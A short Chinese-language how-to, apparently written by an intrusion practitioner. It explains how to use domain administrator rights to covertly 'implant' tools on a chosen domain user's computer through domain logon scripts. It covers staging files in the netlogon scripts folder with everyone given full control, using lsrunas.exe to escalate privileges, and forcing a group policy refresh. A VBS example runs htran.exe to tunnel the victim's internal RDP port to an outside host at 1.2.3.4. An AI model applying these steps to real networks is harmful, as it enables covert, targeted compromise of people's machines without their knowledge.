0x0
工作中,我们拿到域服务器管理员权限就可以对域内任意机器进行植入。有时我们只知道目标的用户名,但是无法判断他在哪台机器上面登录,若是通过bginfo对域登陆事件进行分析提取IP的话,需要花费很大的精力。因此,我们通常使用域的用户登录脚本来实现定向植入。这里需要注意的是,当域用户在本机属于power users组以下权限时是无法运行可执行文件的,因此我们基本上都需要用到lsrunas.exe工具来提权植入。
0x1
如何为一个域用户设置登陆脚本?
开域的netlogon共享。
将我们需要使用的工具和取证服务端放到该目录,修改文件权限everyone完全控制权限。
%systemroot%\sysvol\sysvol\domainname\scripts
%systemroot%\sysvol\sysvol\domainname\policies\guid\user(machine)\scripts
是两个默认路径。
然后我们针对需要植入的域用户配置域用户登录脚本。
这里需要注意,取证服务端的路径应该以\\server\……这样的路径形式,域用户在登陆的时候执行脚本是从域服务器上下载到本地执行的。
配置完成后,必须在命令行下用与管理员输入gpupdate /force强制刷新组策略生效。
注意:使用vbs脚本编写命令时需要注意,需要在objshell.Run””添加命令时如果想要使用双引号,一定要把命令使用双引号双层嵌套。
例如:
Objshell.run”cmd.exe /c “”htran.exe –p –slave 1.2.3.4 80 192.168.1.1 3389”””
本来我们的cmd.exe /c 后面之需要一层双引号,但是我们为了让vbs语句正常使用,必须要再使用一次。